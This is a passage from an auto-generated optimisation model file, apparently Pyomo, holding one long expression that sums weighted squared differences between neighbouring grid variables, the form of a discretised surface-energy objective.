m.x542)**2) + 3.17874498030211*((8.11690209768664*m.x516 - 8.11690209768664*m.x543)**2 + (1.3*
m.x542 - 1.3*m.x543)**2) + 3.17874498030211*((8.11690209768664*m.x517 - 8.11690209768664*m.x544)
**2 + (1.3*m.x543 - 1.3*m.x544)**2) + 3.17874498030211*((8.11690209768664*m.x518 -
8.11690209768664*m.x545)**2 + (1.3*m.x544 - 1.3*m.x545)**2) + 3.17874498030211*((8.11690209768664
*m.x519 - 8.11690209768664*m.x546)**2 + (1.3*m.x545 - 1.3*m.x546)**2) + 3.17874498030211*((
8.11690209768664*m.x520 - 8.11690209768664*m.x547)**2 + (1.3*m.x546 - 1.3*m.x547)**2) +
3.17874498030211*((8.11690209768664*m.x521 - 8.11690209768664*m.x548)**2 + (1.3*m.x547 - 1.3*
m.x548)**2) + 3.17874498030211*((8.11690209768664*m.x522 - 8.11690209768664*m.x549)**2 + (1.3*
m.x548 - 1.3*m.x549)**2) + 3.17874498030211*((8.11690209768664*m.x523 - 8.11690209768664*m.x550)
**2 + (1.3*m.x549 - 1.3*m.x550)**2) + 3.17874498030211*((8.11690209768664*m.x524 -
8.11690209768664*m.x551)**2 + (1.3*m.x550 - 1.3*m.x551)**2) + 3.17874498030211*((8.11690209768664
*m.x525 - 8.11690209768664*m.x552)**2 + (1.3*m.x551 - 1.3*m.x552)**2) + 3.17874498030211*((
8.11690209768664*m.x526 - 8.11690209768664*m.x553)**2 + (1.3*m.x552 - 1.3*m.x553)**2) +
3.17874498030211*((8.11690209768664*m.x527 - 8.11690209768664*m.x554)**2 + (1.3*m.x553 - 1.3*
m.x554)**2) + 3.17874498030211*((8.11690209768664*m.x528 - 8.11690209768664*m.x555)**2 + (1.3*
m.x554 - 1.3*m.x555)**2) + 3.17874498030211*((8.11690209768664*m.x529 - 8.11690209768664*m.x556)
**2 + (1.3*m.x555 - 1.3*m.x556)**2) + 3.17874498030211*((8.11690209768664*m.x530 -
8.11690209768664*m.x557)**2 + (1.3*m.x556 - 1.3*m.x557)**2) + 3.17874498030211*((8.11690209768664
*m.x531 - 8.11690209768664*m.x558)**2 + (1.3*m.x557 - 1.3*m.x558)**2) + 3.17874498030211*((
8.11690209768664*m.x532 - 8.11690209768664*m.x559)**2 + (1.3*m.x558 - 1.3*m.x559)**2) +
3.17874498030211*((8.11690209768664*m.x533 - 8.11690209768664*m.x560)**2 + (1.3*m.x559 - 1.3*
m.x560)**2) + 3.17874498030211*((8.11690209768664*m.x534 - 8.11690209768664*m.x561)**2 + (1.3*
m.x560 - 1.3*m.x561)**2) + 3.17874498030211*((8.11690209768664*m.x535 - 8.11690209768664*m.x562)
**2 + (1.3*m.x561 - 1.3*m.x562)**2) + 3.17874498030211*((8.11690209768664*m.x536 -
8.11690209768664*m.x563)**2 + (1.3*m.x562 - 1.3*m.x563)**2) + 3.17874498030211*((8.11690209768664
*m.x537 - 8.11690209768664*m.x564)**2 + (1.3*m.x563 - 1.3*m.x564)**2) + 3.17874498030211*((
8.11690209768664*m.x538 - 8.11690209768664*m.x565)**2 + (1.3*m.x564 - 1.3*m.x565)**2) +
3.17874498030211*((8.11690209768664*m.x539 - 8.11690209768664*m.x566)**2 + (1.3*m.x565 - 1.3*
m.x566)**2) + 3.17874498030211*((8.11690209768664*m.x540 - 8.11690209768664*m.x567)**2 + (1.3*
m.x566 - 1.3*m.x567)**2) + 3.10003657380855*((8.11690209768664*m.x542 - 8.11690209768664*m.x569)
**2 + (1.3*m.x568 - 1.3*m.x569)**2) + 3.10003657380855*((8.11690209768664*m.x543 -
8.11690209768664*m.x570)**2 + (1.3*m.x569 - 1.3*m.x570)**2) + 3.10003657380855*((8.11690209768664
*m.x544 - 8.11690209768664*m.x571)**2 + (1.3*m.x570 - 1.3*m.x571)**2) + 3.10003657380855*((
8.11690209768664*m.x545 - 8.11690209768664*m.x572)**2 + (1.3*m.x571 - 1.3*m.x572)**2) +
3.10003657380855*((8.11690209768664*m.x546 - 8.11690209768664*m.x573)**2 + (1.3*m.x572 - 1.3*
m.x573)**2) + 3.10003657380855*((8.11690209768664*m.x547 - 8.11690209768664*m.x574)**2 + (1.3*
m.x573 - 1.3*m.x574)**2) + 3.10003657380855*((8.11690209768664*m.x548 - 8.11690209768664*m.x575)
**2 + (1.3*m.x574 - 1.3*m.x575)**2) + 3.10003657380855*((8.11690209768664*m.x549 -
8.11690209768664*m.x576)**2 + (1.3*m.x575 - 1.3*m.x576)**2) + 3.10003657380855*((8.11690209768664
*m.x550 - 8.11690209768664*m.x577)**2 + (1.3*m.x576 - 1.3*m.x577)**2) + 3.10003657380855*((
8.11690209768664*m.x551 - 8.11690209768664*m.x578)**2 + (1.3*m.x577 - 1.3*m.x578)**2) +
3.10003657380855*((8.11690209768664*m.x552 - 8.11690209768664*m.x579)**2 + (1.3*m.x578 - 1.3*
m.x579)**2) + 3.10003657380855*((8.11690209768664*m.x553 - 8.11690209768664*m.x580)**2 + (1.3*
m.x579 - 1.3*m.x580)**2) + 3.10003657380855*((8.11690209768664*m.x554 - 8.11690209768664*m.x581)
**2 + (1.3*m.x580 - 1.3*m.x581)**2) + 3.10003657380855*((8.11690209768664*m.x555 -
8.11690209768664*m.x582)**2 + (1.3*m.x581 - 1.3*m.x582)**2) + 3.10003657380855*((8.11690209768664
*m.x556 - 8.11690209768664*m.x583)**2 + (1.3*m.x582 - 1.3*m.x583)**2) + 3.10003657380855*((
8.11690209768664*m.x557 - 8.11690209768664*m.x584)**2 + (1.3*m.x583 - 1.3*m.x584)**2) +
3.10003657380855*((8.11690209768664*m.x558 - 8.11690209768664*m.x585)**2 + (1.3*m.x584 - 1.3*
m.x585)**2) + 3.10003657380855*((8.11690209768664*m.x559 - 8.11690209768664*m.x586)**2 + (1.3*
m.x585 - 1.3*m.x586)**2) + 3.10003657380855*((8.11690209768664*m.x560 - 8.11690209768664*m.x587)
**2 + (1.3*m.x586 - 1.3*m.x587)**2) + 3.10003657380855*((8.11690209768664*m.x561 -
8.11690209768664*m.x588)**2 + (1.3*m.x587 - 1.3*m.x588)**2) + 3.10003657380855*((8.11690209768664
*m.x562 - 8.11690209768664*m.x589)**2 + (1.3*m.x588 - 1.3*m.x589)**2) + 3.10003657380855*((
8.11690209768664*m.x563 - 8.11690209768664*m.x590)**2 + (1.3*m.x589 - 1.3*m.x590)**2) +
3.10003657380855*((8.11690209768664*m.x564 - 8.11690209768664*m.x591)**2 + (1.3*m.x590 - 1.3*
m.x591)**2) + 3.10003657380855*((8.11690209768664*m.x565 - 8.11690209768664*m.x592)**2 + (1.3*
m.x591 - 1.3*m.x592)**2) + 3.10003657380855*((8.11690209768664*m.x566 - 8.11690209768664*m.x593)
**2 + (1.3*m.x592 - 1.3*m.x593)**2) + 3.10003657380855*((8.11690209768664*m.x567 -
8.11690209768664*m.x594)**2 + (1.3*m.x593 - 1.3*m.x594)**2) + 3.03495253422331*((8.11690209768664
*m.x569 - 8.11690209768664*m.x596)**2 + (1.3*m.x595 - 1.3*m.x596)**2) + 3.03495253422331*((
8.11690209768664*m.x570 - 8.11690209768664*m.x597)**2 + (1.3*m.x596 - 1.3*m.x597)**2) +
3.03495253422331*((8.11690209768664*m.x571 - 8.11690209768664*m.x598)**2 + (1.3*m.x597 - 1.3*
m.x598)**2) + 3.03495253422331*((8.11690209768664*m.x572 - 8.11690209768664*m.x599)**2 + (1.3*
m.x598 - 1.3*m.x599)**2) + 3.03495253422331*((8.11690209768664*m.x573 - 8.11690209768664*m.x600)
**2 + (1.3*m.x599 - 1.3*m.x600)**2) + 3.03495253422331*((8.11690209768664*m.x574 -
8.11690209768664*m.x601)**2 + (1.3*m.x600 - 1.3*m.x601)**2) + 3.03495253422331*((8.11690209768664
*m.x575 - 8.11690209768664*m.x602)**2 + (1.3*m.x601 - 1.3*m.x602)**2) + 3.03495253422331*((
8.11690209768664*m.x576 - 8.11690209768664*m.x603)**2 + (1.3*m.x602 - 1.3*m.x603)**2) +
3.03495253422331*((8.11690209768664*m.x577 - 8.11690209768664*m.x604)**2 + (1.3*m.x603 - 1.3*
m.x604)**2) + 3.03495253422331*((8.11690209768664*m.x578 - 8.11690209768664*m.x605)**2 + (1.3*
m.x604 - 1.3*m.x605)**2) + 3.03495253422331*((8.11690209768664*m.x579 - 8.11690209768664*m.x606)
**2 + (1.3*m.x605 - 1.3*m.x606)**2) + 3.03495253422331*((8.11690209768664*m.x580 -
8.11690209768664*m.x607)**2 + (1.3*m.x606 - 1.3*m.x607)**2) + 3.03495253422331*((8.11690209768664
*m.x581 - 8.11690209768664*m.x608)**2 + (1.3*m.x607 - 1.3*m.x608)**2) + 3.03495253422331*((
8.11690209768664*m.x582 - 8.11690209768664*m.x609)**2 + (1.3*m.x608 - 1.3*m.x609)**2) +
3.03495253422331*((8.11690209768664*m.x583 - 8.11690209768664*m.x610)**2 + (1.3*m.x609 - 1.3*
m.x610)**2) + 3.03495253422331*((8.11690209768664*m.x584 - 8.11690209768664*m.x611)**2 + (1.3*
m.x610 - 1.3*m.x611)**2) + 3.03495253422331*((8.11690209768664*m.x585 - 8.11690209768664*m.x612)
**2 + (1.3*m.x611 - 1.3*m.x612)**2) + 3.03495253422331*((8.11690209768664*m.x586 -
8.11690209768664*m.x613)**2 + (1.3*m.x612 - 1.3*m.x613)**2) + 3.03495253422331*((8.11690209768664
*m.x587 - 8.11690209768664*m.x614)**2 + (1.3*m.x613 - 1.3*m.x614)**2) + 3.03495253422331*((
8.11690209768664*m.x588 - 8.11690209768664*m.x615)**2 + (1.3*m.x614 - 1.3*m.x615)**2) +
3.03495253422331*((8.11690209768664*m.x589 - 8.11690209768664*m.x616)**2 + (1.3*m.x615 - 1.3*
m.x616)**2) + 3.03495253422331*((8.11690209768664*m.x590 - 8.11690209768664*m.x617)**2 + (1.3*
m.x616 - 1.3*m.x617)**2) + 3.03495253422331*((8.11690209768664*m.x591 - 8.11690209768664*m.x618)
**2 + (1.3*m.x617 - 1.3*m.x618)**2) + 3.03495253422331*((8.11690209768664*m.x592 -
8.11690209768664*m.x619)**2 + (1.3*m.x618 - 1.3*m.x619)**2) + 3.03495253422331*((8.11690209768664
*m.x593 - 8.11690209768664*m.x620)**2 + (1.3*m.x619 - 1.3*m.x620)**2) + 3.03495253422331*((
8.11690209768664*m.x594 - 8.11690209768664*m.x621)**2 + (1.3*m.x620 - 1.3*m.x621)**2) +
2.98392983330721*((8.11690209768664*m.x596 - 8.11690209768664*m.x623)**2 + (1.3*m.x622 - 1.3*
m.x623)**2) + 2.98392983330721*((8.11690209768664*m.x597 - 8.11690209768664*m.x624)**2 + (1.3*
m.x623 - 1.3*m.x624)**2) + 2.98392983330721*((8.11690209768664*m.x598 - 8.11690209768664*m.x625)
**2 + (1.3*m.x624 - 1.3*m.x625)**2) + 2.98392983330721*((8.11690209768664*m.x599 -
8.11690209768664*m.x626)**2 + (1.3*m.x625 - 1.3*m.x626)**2) + 2.98392983330721*((8.11690209768664
*m.x600 - 8.11690209768664*m.x627)**2 + (1.3*m.x626 - 1.3*m.x627)**2) + 2.98392983330721*((
8.11690209768664*m.x601 - 8.11690209768664*m.x628)**2 + (1.3*m.x627 - 1.3*m.x628)**2) +
2.98392983330721*((8.11690209768664*m.x602 - 8.11690209768664*m.x629)**2 + (1.3*m.x628 - 1.3*
m.x629)**2) + 2.98392983330721*((8.11690209768664*m.x603 - 8.11690209768664*m.x630)**2 + (1.3*
m.x629 - 1.3*m.x630)**2) + 2.98392983330721*((8.11690209768664*m.x604 - 8.11690209768664*m.x631)
**2 + (1.3*m.x630 - 1.3*m.x631)**2) + 2.98392983330721*((8.11690209768664*m.x605 -
8.11690209768664*m.x632)**2 + (1.3*m.x631 - 1.3*m.x632)**2) + 2.98392983330721*((8.11690209768664
*m.x606 - 8.11690209768664*m.x633)**2 + (1.3*m.x632 - 1.3*m.x633)**2) + 2.98392983330721*((
8.11690209768664*m.x607 - 8.11690209768664*m.x634)**2 + (1.3*m.x633 - 1.3*m.x634)**2) +
2.98392983330721*((8.11690209768664*m.x608 - 8.11690209768664*m.x635)**2 + (1.3*m.x634 - 1.3*
m.x635)**2) + 2.98392983330721*((8.11690209768664*m.x609 - 8.11690209768664*m.x636)**2 + (1.3*
m.x635 - 1.3*m.x636)**2) + 2.98392983330721*((8.11690209768664*m.x610 - 8.11690209768664*m.x637)
**2 + (1.3*m.x636 - 1.3*m.x637)**2) + 2.98392983330721*((8.11690209768664*m.x611 -
8.11690209768664*m.x638)**2 + (1.3*m.x637 - 1.3*m.x638)**2) + 2.98392983330721*((8.11690209768664
*m.x612 - 8.11690209768664*m.x639)**2 + (1.3*m.x638 - 1.3*m.x639)**2) + 2.98392983330721*((
8.11690209768664*m.x613 - 8.11690209768664*m.x640)**2 + (1.3*m.x639 - 1.3*m.x640)**2) +
2.98392983330721*((8.11690209768664*m.x614 - 8.11690209768664*m.x641)**2 + (1.3*m.x640 - 1.3*
m.x641)**2) + 2.98392983330721*((8.11690209768664*m.x615 - 8.11690209768664*m.x642)**2 + (1.3*
m.x641 - 1.3*m.x642)**2) + 2.98392983330721*((8.11690209768664*m.x616 - 8.11690209768664*m.x643)
**2 + (1.3*m.x642 - 1.3*m.x643)**2) + 2.98392983330721*((8.11690209768664*m.x617 -
8.11690209768664*m.x644)**2 + (1.3*m.x643 - 1.3*m.x644)**2) + 2.98392983330721*((8.11690209768664
*m.x618 - 8.11690209768664*m.x645)**2 + (1.3*m.x644 - 1.3*m.x645)**2) + 2.98392983330721*((
8.11690209768664*m.x619 - 8.11690209768664*m.x646)**2 + (1.3*m.x645 - 1.3*m.x646)**2) +
2.98392983330721*((8.11690209768664*m.x620 - 8.11690209768664*m.x647)**2 + (1.3*m.x646 - 1.3*
m.x647)**2) + 2.98392983330721*((8.11690209768664*m.x621 - 8.11690209768664*m.x648)**2 + (1.3*
m.x647 - 1.3*m.x648)**2) + 2.94728071564996*((8.11690209768664*m.x623 - 8.11690209768664*m.x650)
**2 + (1.3*m.x649 - 1.3*m.x650)**2) + 2.94728071564996*((8.11690209768664*m.x624 -
8.11690209768664*m.x651)**2 + (1.3*m.x650 - 1.3*m.x651)**2) + 2.94728071564996*((8.11690209768664
*m.x625 - 8.11690209768664*m.x652)**2 + (1.3*m.x651 - 1.3*m.x652)**2) + 2.94728071564996*((
8.11690209768664*m.x626 - 8.11690209768664*m.x653)**2 + (1.3*m.x652 - 1.3*m.x653)**2) +
2.94728071564996*((8.11690209768664*m.x627 - 8.11690209768664*m.x654)**2 + (1.3*m.x653 - 1.3*
m.x654)**2) + 2.94728071564996*((8.11690209768664*m.x628 - 8.11690209768664*m.x655)**2 + (1.3*
m.x654 - 1.3*m.x655)**2) + 2.94728071564996*((8.11690209768664*m.x629 - 8.11690209768664*m.x656)
**2 + (1.3*m.x655 - 1.3*m.x656)**2) + 2.94728071564996*((8.11690209768664*m.x630 -
8.11690209768664*m.x657)**2 + (1.3*m.x656 - 1.3*m.x657)**2) + 2.94728071564996*((8.11690209768664
*m.x631 - 8.11690209768664*m.x658)**2 + (1.3*m.x657 - 1.3*m.x658)**2) + 2.94728071564996*((
8.11690209768664*m.x632 - 8.11690209768664*m.x659)**2 + (1.3*m.x658 - 1.3*m.x659)**2) +
2.94728071564996*((8.11690209768664*m.x633 - 8.11690209768664*m.x660)**2 + (1.3*m.x659 - 1.3*
m.x660)**2) + 2.94728071564996*((8.11690209768664*m.x634 - 8.11690209768664*m.x661)**2 + (1.3*
m.x660 - 1.3*m.x661)**2) + 2.94728071564996*((8.11690209768664*m.x635 - 8.11690209768664*m.x662)
**2 + (1.3*m.x661 - 1.3*m.x662)**2) + 2.94728071564996*((8.11690209768664*m.x636 -
8.11690209768664*m.x663)**2 + (1.3*m.x662 - 1.3*m.x663)**2) + 2.94728071564996*((8.11690209768664
*m.x637 - 8.11690209768664*m.x664)**2 + (1.3*m.x663 - 1.3*m.x664)**2) + 2.94728071564996*((
8.11690209768664*m.x638 - 8.11690209768664*m.x665)**2 + (1.3*m.x664 - 1.3*m.x665)**2) +
2.94728071564996*((8.11690209768664*m.x639 - 8.11690209768664*m.x666)**2 + (1.3*m.x665 - 1.3*
m.x666)**2) + 2.94728071564996*((8.11690209768664*m.x640 - 8.11690209768664*m.x667)**2 + (1.3*
m.x666 - 1.3*m.x667)**2) + 2.94728071564996*((8.11690209768664*m.x641 - 8.11690209768664*m.x668)
**2 + (1.3*m.x667 - 1.3*m.x668)**2) + 2.94728071564996*((8.11690209768664*m.x642 -
8.11690209768664*m.x669)**2 + (1.3*m.x668 - 1.3*m.x669)**2) + 2.94728071564996*((8.11690209768664
*m.x643 - 8.11690209768664*m.x670)**2 + (1.3*m.x669 - 1.3*m.x670)**2) + 2.94728071564996*((
8.11690209768664*m.x644 - 8.11690209768664*m.x671)**2 + (1.3*m.x670 - 1.3*m.x671)**2) +
2.94728071564996*((8.11690209768664*m.x645 - 8.11690209768664*m.x672)**2 + (1.3*m.x671 - 1.3*
m.x672)**2) + 2.94728071564996*((8.11690209768664*m.x646 - 8.11690209768664*m.x673)**2 + (1.3*
m.x672 - 1.3*m.x673)**2) + 2.94728071564996*((8.11690209768664*m.x647 - 8.11690209768664*m.x674)
**2 + (1.3*m.x673 - 1.3*m.x674)**2) + 2.94728071564996*((8.11690209768664*m.x648 -
8.11690209768664*m.x675)**2 + (1.3*m.x674 - 1.3*m.x675)**2) + 2.92521271535938*((8.11690209768664
*m.x650 - 8.11690209768664*m.x677)**2 + (1.3*m.x676 - 1.3*m.x677)**2) + 2.92521271535938*((
8.11690209768664*m.x651 - 8.11690209768664*m.x678)**2 + (1.3*m.x677 - 1.3*m.x678)**2) +
2.92521271535938*((8.11690209768664*m.x652 - 8.11690209768664*m.x679)**2 + (1.3*m.x678 - 1.3*
m.x679)**2) + 2.92521271535938*((8.11690209768664*m.x653 - 8.11690209768664*m.x680)**2 + (1.3*
m.x679 - 1.3*m.x680)**2) + 2.92521271535938*((8.11690209768664*m.x654 - 8.11690209768664*m.x681)
**2 + (1.3*m.x680 - 1.3*m.x681)**2) + 2.92521271535938*((8.11690209768664*m.x655 -
8.11690209768664*m.x682)**2 + (1.3*m.x681 - 1.3*m.x682)**2) + 2.92521271535938*((8.11690209768664
*m.x656 - 8.11690209768664*m.x683)**2 + (1.3*m.x682 - 1.3*m.x683)**2) + 2.92521271535938*((
8.11690209768664*m.x657 - 8.11690209768664*m.x684)**2 + (1.3*m.x683 - 1.3*m.x684)**2) +
2.92521271535938*((8.11690209768664*m.x658 - 8.11690209768664*m.x685)**2 + (1.3*m.x684 - 1.3*
m.x685)**2) + 2.92521271535938*((8.11690209768664*m.x659 - 8.11690209768664*m.x686)**2 + (1.3*
m.x685 - 1.3*m.x686)**2) + 2.92521271535938*((8.11690209768664*m.x660 - 8.11690209768664*m.x687)
**2 + (1.3*m.x686 - 1.3*m.x687)**2) + 2.92521271535938*((8.11690209768664*m.x661 -
8.11690209768664*m.x688)**2 + (1.3*m.x687 - 1.3*m.x688)**2) + 2.92521271535938*((8.11690209768664
*m.x662 - 8.11690209768664*m.x689)**2 + (1.3*m.x688 - 1.3*m.x689)**2) + 2.92521271535938*((
8.11690209768664*m.x663 - 8.11690209768664*m.x690)**2 + (1.3*m.x689 - 1.3*m.x690)**2) +
2.92521271535938*((8.11690209768664*m.x664 - 8.11690209768664*m.x691)**2 + (1.3*m.x690 - 1.3*
m.x691)**2) + 2.92521271535938*((8.11690209768664*m.x665 - 8.11690209768664*m.x692)**2 + (1.3*
m.x691 - 1.3*m.x692)**2) + 2.92521271535938*((8.11690209768664*m.x666 - 8.11690209768664*m.x693)
**2 + (1.3*m.x692 - 1.3*m.x693)**2) + 2.92521271535938*((8.11690209768664*m.x667 -
8.11690209768664*m.x694)**2 + (1.3*m.x693 - 1.3*m.x694)**2) + 2.92521271535938*((8.11690209768664
*m.x668 - 8.11690209768664*m.x695)**2 + (1.3*m.x694 - 1.3*m.x695)**2) + 2.92521271535938*((
8.11690209768664*m.x669 - 8.11690209768664*m.x696)**2 + (1.3*m.x695 - 1.3*m.x696)**2) +
2.92521271535938*((8.11690209768664*m.x670 - 8.11690209768664*m.x697)**2 + (1.3*m.x696 - 1.3*
m.x697)**2) + 2.92521271535938*((8.11690209768664*m.x671 - 8.11690209768664*m.x698)**2 + (1.3*
m.x697 - 1.3*m.x698)**2) + 2.92521271535938*((8.11690209768664*m.x672 - 8.11690209768664*m.x699)
**2 + (1.3*m.x698 - 1.3*m.x699)**2) + 2.92521271535938*((8.11690209768664*m.x673 -
8.11690209768664*m.x700)**2 + (1.3*m.x699 - 1.3*m.x700)**2) + 2.92521271535938*((8.11690209768664
*m.x674 - 8.11690209768664*m.x701)**2 + (1.3*m.x700 - 1.3*m.x701)**2) + 2.92521271535938*((
8.11690209768664*m.x675 - 8.11690209768664*m.x702)**2 + (1.3*m.x701 - 1.3*m.x702)**2) +
2.91784395300997*((8.11690209768664*m.x677 - 8.11690209768664*m.x704)**2 + (1.3*m.x703 - 1.3*
m.x704)**2) + 2.91784395300997*((8.11690209768664*m.x678 - 8.11690209768664*m.x705)**2 + (1.3*
m.x704 - 1.3*m.x705)**2) + 2.91784395300997*((8.11690209768664*m.x679 - 8.11690209768664*m.x706)
**2 + (1.3*m.x705 - 1.3*m.x706)**2) + 2.91784395300997*((8.11690209768664*m.x680 -
8.11690209768664*m.x707)**2 + (1.3*m.x706 - 1.3*m.x707)**2) + 2.91784395300997*((8.11690209768664
*m.x681 - 8.11690209768664*m.x708)**2 + (1.3*m.x707 - 1.3*m.x708)**2) + 2.91784395300997*((
8.11690209768664*m.x682 - 8.11690209768664*m.x709)**2 + (1.3*m.x708 - 1.3*m.x709)**2) +
2.91784395300997*((8.11690209768664*m.x683 - 8.11690209768664*m.x710)**2 + (1.3*m.x709 - 1.3*
m.x710)**2) + 2.91784395300997*((8.11690209768664*m.x684 - 8.11690209768664*m.x711)**2 + (1.3*
m.x710 - 1.3*m.x711)**2) + 2.91784395300997*((8.11690209768664*m.x685 - 8.11690209768664*m.x712)
**2 + (1.3*m.x711 - 1.3*m.x712)**2) + 2.91784395300997*((8.11690209768664*m.x686 -
8.11690209768664*m.x713)**2 + (1.3*m.x712 - 1.3*m.x713)**2) + 2.91784395300997*((8.11690209768664
*m.x687 - 8.11690209768664*m.x714)**2 + (1.3*m.x713 - 1.3*m.x714)**2) + 2.91784395300997*((
8.11690209768664*m.x688 - 8.11690209768664*m.x715)**2 + (1.3*m.x714 - 1.3*m.x715)**2) +
2.91784395300997*((8.11690209768664*m.x689 - 8.11690209768664*m.x716)**2 + (1.3*m.x715 - 1.3*
m.x716)**2) + 2.91784395300997*((8.11690209768664*m.x690 - 8.11690209768664*m.x717)**2 + (1.3*
m.x716 - 1.3*m.x717)**2) + 2.91784395300997*((8.11690209768664*m.x691 - 8.11690209768664*m.x718)
**2 + (1.3*m.x717 - 1.3*m.x718)**2) + 2.91784395300997*((8.11690209768664*m.x692 -
8.11690209768664*m.x719)**2 + (1.3*m.x718 - 1.3*m.x719)**2) + 2.91784395300997*((8.11690209768664
*m.x693 - 8.11690209768664*m.x720)**2 + (1.3*m.x719 - 1.3*m.x720)**2) + 2.91784395300997*((
8.11690209768664*m.x694 - 8.11690209768664*m.x721)**2 + (1.3*m.x720 - 1.3*m.x721)**2) +
2.91784395300997*((8.11690209768664*m.x695 - 8.11690209768664*m.x722)**2 + (1.3*m.x721 - 1.3*
m.x722)**2) + 2.91784395300997*((8.11690209768664*m.x696 - 8.11690209768664*m.x723)**2 + (1.3*
m.x722 - 1.3*m.x723)**2) + 2.91784395300997*((8.11690209768664*m.x697 - 8.11690209768664*m.x724)
**2 + (1.3*m.x723 - 1.3*m.x724)**2) + 2.91784395300997*((8.11690209768664*m.x698 -
8.11690209768664*m.x725)**2 + (1.3*m.x724 - 1.3*m.x725)**2) + 2.91784395300997*((8.11690209768664
*m.x699 - 8.11690209768664*m.x726)**2 + (1.3*m.x725 - 1.3*m.x726)**2) + 2.91784395300997*((
8.11690209768664*m.x700 - 8.11690209768664*m.x727)**2 + (1.3*m.x726 - 1.3*m.x727)**2) +
2.91784395300997*((8.11690209768664*m.x701 - 8.11690209768664*m.x728)**2 + (1.3*m.x727 - 1.3*
m.x728)**2) + 2.91784395300997*((8.11690209768664*m.x702 - 8.11690209768664*m.x729)**2 + (1.3*
m.x728 - 1.3*m.x729)**2) + 2.92521271535938*((8.11690209768664*m.x704 - 8.11690209768664*m.x731)
**2 + (1.3*m.x730 - 1.3*m.x731)**2) + 2.92521271535938*((8.11690209768664*m.x705 -
8.11690209768664*m.x732)**2 + (1.3*m.x731 - 1.3*m.x732)**2) + 2.92521271535938*((8.11690209768664
*m.x706 - 8.11690209768664*m.x733)**2 + (1.3*m.x732 - 1.3*m.x733)**2) + 2.92521271535938*((
8.11690209768664*m.x707 - 8.11690209768664*m.x734)**2 + (1.3*m.x733 - 1.3*m.x734)**2) +
2.92521271535938*((8.11690209768664*m.x708 - 8.11690209768664*m.x735)**2 + (1.3*m.x734 - 1.3*
m.x735)**2) + 2.92521271535938*((8.11690209768664*m.x709 - 8.11690209768664*m.x736)**2 + (1.3*
m.x735 - 1.3*m.x736)**2) + 2.92521271535938*((8.11690209768664*m.x710 - 8.11690209768664*m.x737)
**2 + (1.3*m.x736 - 1.3*m.x737)**2) + 2.92521271535938*((8.11690209768664*m.x711 -
8.11690209768664*m.x738)**2 + (1.3*m.x737 - 1.3*m.x738)**2) + 2.92521271535938*((8.11690209768664
*m.x712 - 8.11690209768664*m.x739)**2 + (1.3*m.x738 - 1.3*m.x739)**2) + 2.92521271535938*((
8.11690209768664*m.x713 - 8.11690209768664*m.x740)**2 + (1.3*m.x739 - 1.3*m.x740)**2) +
2.92521271535938*((8.11690209768664*m.x714 - 8.11690209768664*m.x741)**2 + (1.3*m.x740 - 1.3*
m.x741)**2) + 2.92521271535938*((8.11690209768664*m.x715 - 8.11690209768664*m.x742)**2 + (1.3*
m.x741 - 1.3*m.x742)**2) + 2.92521271535938*((8.11690209768664*m.x716 - 8.11690209768664*m.x743)
**2 + (1.3*m.x742 - 1.3*m.x743)**2) + 2.92521271535938*((8.11690209768664*m.x717 -
8.11690209768664*m.x744)**2 + (1.3*m.x743 - 1.3*m.x744)**2) + 2.92521271535938*((8.11690209768664
*m.x718 - 8.11690209768664*m.x745)**2 + (1.3*m.x744 - 1.3*m.x745)**2) + 2.92521271535938*((
8.11690209768664*m.x719 - 8.11690209768664*m.x746)**2 + (1.3*m.x745 - 1.3*m.x746)**2) +
2.92521271535938*((8.11690209768664*m.x720 - 8.11690209768664*m.x747)**2 + (1.3*m.x746 - 1.3*
m.x747)**2) + 2.92521271535938*((8.11690209768664*m.x721 - 8.11690209768664*m.x748)**2 + (1.3*
m.x747 - 1.3*m.x748)**2) + 2.92521271535938*((8.11690209768664*m.x722 - 8.11690209768664*m.x749)
**2 + (1.3*m.x748 - 1.3*m.x749)**2) + 2.92521271535938*((8.11690209768664*m.x723 -
8.11690209768664*m.x750)**2 + (1.3*m.x749 - 1.3*m.x750)**2) + 2.92521271535938*((8.11690209768664
*m.x724 - 8.11690209768664*m.x751)**2 + (1.3*m.x750 - 1.3*m.x751)**2) + 2.92521271535938*((
8.11690209768664*m.x725 - 8.11690209768664*m.x752)**2 + (1.3*m.x751 - 1.3*m.x752)**2) +
2.92521271535938*((8.11690209768664*m.x726 - 8.11690209768664*m.x753)**2 + (1.3*m.x752 - 1.3*
m.x753)**2) + 2.92521271535938*((8.11690209768664*m.x727 - 8.11690209768664*m.x754)**2 + (1.3*
m.x753 - 1.3*m.x754)**2) + 2.92521271535938*((8.11690209768664*m.x728 - 8.11690209768664*m.x755)
**2 + (1.3*m.x754 - 1.3*m.x755)**2) + 2.92521271535938*((8.11690209768664*m.x729 -
8.11690209768664*m.x756)**2 + (1.3*m.x755 - 1.3*m.x756)**2) + 2.94728071564996*((8.11690209768664
*m.x731 - 8.11690209768664*m.x758)**2 + (1.3*m.x757 - 1.3*m.x758)**2) + 2.94728071564996*((
8.11690209768664*m.x732 - 8.11690209768664*m.x759)**2 + (1.3*m.x758 - 1.3*m.x759)**2) +
2.94728071564996*((8.11690209768664*m.x733 - 8.11690209768664*m.x760)**2 + (1.3*m.x759 - 1.3*
m.x760)**2) + 2.94728071564996*((8.11690209768664*m.x734 - 8.11690209768664*m.x761)**2 + (1.3*
m.x760 - 1.3*m.x761)**2) + 2.94728071564996*((8.11690209768664*m.x735 - 8.11690209768664*m.x762)
**2 + (1.3*m.x761 - 1.3*m.x762)**2) + 2.94728071564996*((8.11690209768664*m.x736 -
8.11690209768664*m.x763)**2 + (1.3*m.x762 - 1.3*m.x763)**2) + 2.94728071564996*((8.11690209768664
*m.x737 - 8.11690209768664*m.x764)**2 + (1.3*m.x763 - 1.3*m.x764)**2) + 2.94728071564996*((
8.11690209768664*m.x738 - 8.11690209768664*m.x765)**2 + (1.3*m.x764 - 1.3*m.x765)**2) +
2.94728071564996*((8.11690209768664*m.x739 - 8.11690209768664*m.x766)**2 + (1.3*m.x765 - 1.3*
m.x766)**2) + 2.94728071564996*((8.11690209768664*m.x740 - 8.11690209768664*m.x767)**2 + (1.3*
m.x766 - 1.3*m.x767)**2) + 2.94728071564996*((8.11690209768664*m.x741 - 8.11690209768664*m.x768)
**2 + (1.3*m.x767 - 1.3*m.x768)**2) + 2.94728071564996*((8.11690209768664*m.x742 -
8.11690209768664*m.x769)**2 + (1.3*m.x768 - 1.3*m.x769)**2) + 2.94728071564996*((8.11690209768664
*m.x743 - 8.11690209768664*m.x770)**2 + (1.3*m.x769 - 1.3*m.x770)**2) + 2.94728071564996*((
